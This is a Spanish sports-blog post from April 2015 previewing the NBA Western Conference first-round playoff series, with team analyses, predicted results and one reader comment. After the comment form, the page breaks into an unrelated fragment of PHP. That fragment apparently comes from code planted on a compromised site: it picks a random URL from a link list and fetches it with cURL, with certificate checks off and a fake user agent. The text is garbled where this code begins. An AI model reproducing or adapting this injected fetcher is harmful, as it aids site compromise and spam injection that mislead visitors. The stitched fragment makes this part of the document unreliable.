Previa Playoffs: Conferencia Oeste

18 de April de 2015 por TheDeerHunter

Con la incorporación final de los Pelicans a un cuadro de lo más intimidante y pese a la ausencia de unos Thunder que parecen malditos, los Playoffs del Oeste se presentan espectaculares. Los Warriors esperan prolongar su sensacional rendimiento de la regular season pero Popovich & Co. tienen otros planes. Analizamos las cuatro series de primera ronda.

Golden State Warriors (1) vs New Orleans Pelicans (8)

warriors_pelicans

Balance Warriors: 67-15
Balance Pelicans: 45-37
Duelos directos 2014-2015: Warriors 3 – Pelicans 1

Análisis por TheDeerHunter

Pocas dudas. Los Warriors se han comportado como una máquina de aplastar rivales durante toda campaña, en ocasiones con una facilidad insultantemente pasmosa. Se trata del equipo más dominante en regular que hemos visto en años y el tercer equipo desde 1977 que logra colocarse top 2 en las tablas de eficiencia ofensiva y defensiva simultáneamente. Se puede decir, sin temor a la exageración, que los Warriors pueden contar con 10-12 hombres que pueden aportar minutos de calidad gracias a uno de los bloques más potentes y equilibrados que nos vienen a la memoria. El Oracle Arena es la plaza más inexpugnable que existe en la NBA hoy en día y es una parroquia que sabe calentar el ambiente en función de la trascendencia del choque, por lo que va a ser una olla a presión durante todos los Playoffs. Si aún no estamos impresionados, hay que valorar que su regular/paseo en barca les ha permitido regular minutos como pocos y parecen llegar a este momento decisivo en un estado óptimo de forma, con gasolina de sobra y, lo más importante, completamente sanos. Añado que el modo “sobrado” de Curry puede darle el MVP, pero que su versión más letal es el modo “trance” que ya le hemos visto en alguna que otra eliminatoria de Playoffs. No conviene olvidar tampoco que el equipo está dirigido desde el banquillo por el que será, con total seguridad, Coach of the Year de la 2014/15. Steve Kerr, alma de campeón, ha despejado toda duda.

Tiene mucho mérito lo de los Pelicans con esa remontada épica del tramo final de la regular para dejar en la cuneta nada menos que a Westbrook y sus Oklahoma City Thunder en el primer capítulo de muchas páginas de gloria que deberá escribir Anthony Davis en un futuro próximo. No pueden esperar mucho más, en esta ocasión, que vivir la experiencia y no va a ser muy agradable. Como la esperanza es lo último que se pierde, los Pelicans deberán jugar la baza de no tener nada que perder y de la hipotética presión de sus rivales por luchar contra su propia historia. El dato es que los aparentemente intocables Warriors solo han ganado dos series de Playoffs en los últimos 24 años. Claro que las estadísticas están para romperse y los Pelicans tampoco han ganado muchas más eliminatorias en toda su historia.

Pronóstico: Golden State Warriors 4 – New Orleans Pelicans 0

Houston Rockets (2) vs Dallas Mavericks (7)

rockets_mavs

Balance Rockets: 56-26
Balance Mavericks: 50-32
Duelos directos 2014-2015: Rockets 3 – Mavericks 1

Análisis por Viva_Dirk

Temporada de gran éxito para los Rockets, que se han sobrepuesto a las largas bajas de Dwight Howard y Terrence Jones, y en menor medida de Beverley, sustentados en la brutal campaña de James Harden, que está en todas las quinielas por el MVP. Fuera de él, podemos encontrar pocas cosas destacables, y las que lo son quedan a años luz de la ‘Black Barba’ de la liga, aunque podemos fijarnos en la esperanzadora campaña de Motiejunas, que ha dejado buenas muestras de su talento. Una vez llegados hasta aquí, los Rockets van a necesitar a un Howard que pueda aportar intimidación y que atraiga a las defensas rivales para abrir el campo al equipo que más triples ha anotado en la historia de la liga. Los jóvenes como Jones, Motiejunas, Papanikolau o Beverley deben demostrar que tienen hambre de gloria, y veteranos como Ariza, Terry o Brewer, que saben lo que se hacen en la post temporada.

Los Mavs han jugado la temporada regular mirando en todo momento a los Playoffs: ninguno de sus jugadores llega a los 34 minutos por partido y hasta diez pasan de los 10 minutos. Su principal arma es el colectivo y lo saben. Las incorporaciones de Rondo y Stoudemire solo se entienden en el contexto de los Playoffs, puesto que son dos jugadores con pinta de estar pasados de rosca pero que han demostrado siempre una gran competitividad cuando el anillo estaba a su alcance. El núcleo formado por Nowitzki, Ellis, Parsons y Chandler tiene poco que envidiar a ninguno en la suma de muchas facetas del juego y cada uno de ellos sabe hasta dónde llega su trabajo.

La megaestrella contra el grupo, músculo y ganas contra experiencia y temple. Hemos visto muy buenas batallas con estos argumentos anteriormente y eso esperamos de esta, a la que se llega con la incógnita del estado físico de Howard, que tendrá que pelear con uno de los mejores centers defensivos de los últimos 15 años como es Tyson Chandler. No tenemos dudas de que Harden será un martillo al que varias piezas intentarán frenar, pero en cambio no se vislumbran piezas suficientes para frenar los momentos de inspiración de Nowitzki y sus secuaces. Para acabar, el factor entrenador cae del lado de los Mavericks. Carlisle ya puso en unos tremendos apuros el año pasado nada menos que a Popovich.

Pronóstico: Dallas Mavericks 4 – Houston Rockets 2

L.A. Clippers (3) vs San Antonio Spurs (6)

clippers_spurs

Balance Clippers: 56-26
Balance Spurs: 55-27
Duelos directos 2014-2015: 2-2

Análisis por MagicJohnson32

Los vigentes campeones alcanzan los Playoffs en una posición que no hace justicia a la excelencia mostrada en el tramo final de regular season, cuando enlazaron 11 victorias consecutivas para alzarse hasta una segunda posición que finalmente, y debido a la derrota ante unos Pelicans que se jugaban la vida, se escapó. Así es el Oeste, donde 55 victorias únicamente te dan para ser sexto. Darwinismo en versión NBA. Sucede sin embargo, que aunque las estadísticas no sean alentadoras (siempre que han alcanzado las finales de Conferencia, los Spurs venían de ser al menos terceros), los texanos están demasiado curtidos para que les afecte haber caído cuatro posiciones y no contar con el factor cancha.

Enfrente, y con ventaja de campo, estarán los Clippers, que han cedido el trono de la Pacific a los Warriors pero se mantienen en la elite de la Conferencia y, aunque no han mejorado el balance de temporadas recientes, parecen haber ganado un punto de madurez. Así al menos lo demostraron durante la baja de Blake Griffin, un periodo que lejos de poner en peligro la clasificación de los angelinos para post temporada (como, reconozcámoslo, muchos nos temimos), le sentó muy bien a los de Doc Rivers. Chris Paul, pese al escaso reconocimiento que ha recibido este año, ha firmado otra campaña para enmarcar; DeAndre Jordan ha disparado sus cifras reboteadoras y su impacto defensivo; Griffin se ha destapado como uno de los mejores pasadores interiores de la liga; y JJ Redick se ha confirmado como un anotador fiable y dignísimo titular para un equipo aspirante. Pero ¿es suficiente?

Desafortunadamente para los Clippers, la consecución de la tercera plaza del Oeste llegaba con el regalo de un cruce terrible para empezar. Los Spurs, que en marzo estaban séptimos y con escaso margen de error, demostraron una vez más que su juego florece en primavera y, pese al tropiezo final, pocos equipos se presentan en la lucha por el título en mejores condiciones que ellos. Tal vez por individualidades los Clippers se lleven un par de duelos pero por conjunto, por experiencia, por recursos y profundidad, vemos una serie inclinada con cierta claridad del lado de los Spurs y que probablemente no se prolongue más allá del sexto encuentro.

Pronóstico: L.A. Clippers 2 – San Antonio Spurs 4

Portland Trail Blazers (4) vs Memphis Grizzlies (5)

blazers_grizzlies

Balance Blazers: 51-31
Balance Grizzlies: 55-27
Duelos directos 2014-2015: Grizzlies 4 – Blazers 0

Análisis por TheDeerHunter

La regular se les ha hecho excesivamente larga a estos dos duros contendientes del Oeste. Ambos se han visto afectados por problemas físicos, aunque son los Blazers los que se llevan la palma en este sentido. Las lesiones van a condicionar decisivamente una eliminatoria que en otras circunstancias bien podría haber estado a la altura, por el nivel demostrado durante muchas fases de la regular, de una final de conferencia. Esta cuestión tiene un nombre propio, Wes Matthews, quien no será una estrella de primera magnitud pero sí es insustituible en los esquemas de Terry Stotts, como primer defensor de perímetro y tirador de elite. No es casualidad que en su ausencia los ratios de eficiencia ofensiva y defensiva cayeran, si bien la situación se ha visto empeorada dramáticamente por un parte médico que bien parece de guerra. Casi todas las piezas clave de la ya de por sí corta plantilla de los Blazers llegan tocados al momento decisivo de la campaña y la presencia de muchos ellos durante el trascurso de toda la serie es dudosa.

Los Grizzlies tampoco llegan tirando cohetes a este momento, malviviendo con un pírrico 50% de victorias desde el All Star. Han sufrido numerosos problemas físicos pero nada de excesiva gravedad, por lo que llegan esencialmente intactos. La extramotivación del “win or go home” bien puede suplir la falta de gasolina que se les ha notado recientemente. Se trata del equipo “perro” por antonomasia en la conferencia y los playoffs son su hábitat natural, donde cuentan con una habilidad especial para llevar a sus rivales hasta el límite. Sus credenciales: la mejor defensa del la liga, un juego interior imparable, gen competitivo, agresividad, oficio… bazas a respetar por cualquier rival, máxime si no te presentas al 100%.

No obstante, los Blazers también tienen sus bazas. De la mano del dúo Lillard-Aldridge los Blazers parecen capaces de sobreponerse a casi cualquier adversidad. Muy pocos podían esperar que esta plantilla pudiera mantenerse entre la elite de esta conferencia, como ahora muy pocos pueden confiar en una victoria, asolados como están por las lesiones. Sabemos que son capaces de las mayores gestas. El problema es que otra de las virtudes de los Grizzlies es desactivar “dúos dinámicos” con excelsos especialistas defensivos tanto exteriores como interiores, además de alternativas tácticas. Todo un reto.

Pronóstico: Portland Trail Blazers 2 – Memphis Grizzlies 4

¡Y no dejéis de participar en la porra de los Playoffs!

Comenta

Un comentario a esta entrada

  1. Ruxixón dice:
    #1

    Quien le iba a decir a Parsons que se iba a jugar una serie de PO contra su ex-equipo,a ver el ambiente.Con el recuerdo de la serie que disputó Dallas a San Antonio el año pasado y el habitual Harden-Houston no es jugador-equipo de PO,uno se puede oler el upset aquí.No hay otra oportunidad como esta para Houston de enterrar esos fantasmas.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>